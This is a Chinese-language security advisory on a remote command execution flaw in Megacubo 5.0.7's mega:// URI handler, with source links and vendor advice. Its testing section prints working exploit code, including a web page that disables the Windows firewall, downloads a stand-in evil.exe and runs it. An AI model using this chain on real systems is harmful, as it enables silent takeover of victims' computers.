安全研究

安全漏洞
Megacubo mega:// URI处理器远程命令执行漏洞

发布日期:2008-12-30
更新日期:2008-12-31

受影响系统:
Megacubo Megacubo 5.0.7
描述:
BUGTRAQ  ID: 33062

Megacubo是用PHP和Winbinder编写的IPTV应用程序。

Megacubo的mega:// uri处理器没有正确地验证通过play命令所传送的参数,如果远程攻击者提交了带有con(设备名称)参数的play命令的话,就可以绕过file_exists()检查将恶意参数拷贝到c:\DATASTORE.txt文件并执行。

<*来源:pyrokinesis (pyro@nospam.it
  
  链接:http://marc.info/?l=bugtraq&m=123065545127269&w=2
        http://secunia.com/advisories/33326/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

mega://play|con.."a()".system(base64_decode('Y21kIC9jIHN0YXJ0IGNhbGM='))."/?");print(


<html>
<head>
<title>MegaCubo - download & Execute</title>
<meta http-equiv="Content-Type" content="text/html; ">
</head>
<body>
<script>
// url download & exec code evil
evil = 'http://www.example.com/evil.exe';

// disable firewall  encode base_64
firewall = 'bmV0c2ggZmlyZXdhbGwgc2V0IG9wbW9kZSBtb2RlID0gZGlzYWJsZQ==';

shellcode = 'mega://play|con.."a()".system(base64_decode("'+firewall+'")).fputs(fopen("c:/Megacubo.exe","w"),file_get_contents("'+evil+'")).system("C:/Megacubo.exe")."/?");print(';

// shell code
window.location=shellcode;

</script>
</body>
</html>

建议:
厂商补丁:

Megacubo
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.megacubo.net/tv/

浏览次数:2530
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障